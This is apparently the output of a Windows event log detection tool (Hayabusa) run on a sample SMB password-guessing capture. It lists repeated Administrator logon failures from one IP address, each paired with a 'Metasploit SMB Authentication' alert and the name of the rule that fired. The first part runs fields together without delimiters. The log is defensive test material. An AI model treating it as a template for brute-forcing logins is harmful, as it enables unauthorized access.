12372016-09-20 01:50:09.968 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12382016-09-20 01:50:10.016 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12392016-09-20 01:50:10.016 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12402016-09-20 01:50:10.061 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12412016-09-20 01:50:10.061 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12422016-09-20 01:50:10.156 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12432016-09-20 01:50:10.156 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12442016-09-20 01:50:10.191 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12452016-09-20 01:50:10.191 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12462016-09-20 01:50:10.222 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12472016-09-20 01:50:10.222 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12482016-09-20 01:50:10.263 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12492016-09-20 01:50:10.263 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12502016-09-20 01:50:10.311 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12512016-09-20 01:50:10.311 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12522016-09-20 01:50:10.344 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12532016-09-20 01:50:10.344 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12542016-09-20 01:50:10.383 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12552016-09-20 01:50:10.383 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12562016-09-20 01:50:10.423 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12572016-09-20 01:50:10.423 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12582016-09-20 01:50:10.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12592016-09-20 01:50:10.462 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12602016-09-20 01:50:10.508 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12612016-09-20 01:50:10.508 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12622016-09-20 01:50:10.547 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12632016-09-20 01:50:10.547 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12642016-09-20 01:50:10.580 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12652016-09-20 01:50:10.580 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12662016-09-20 01:50:10.619 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12672016-09-20 01:50:10.619 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12682016-09-20 01:50:10.659 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
12692016-09-20 01:50:10.659 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
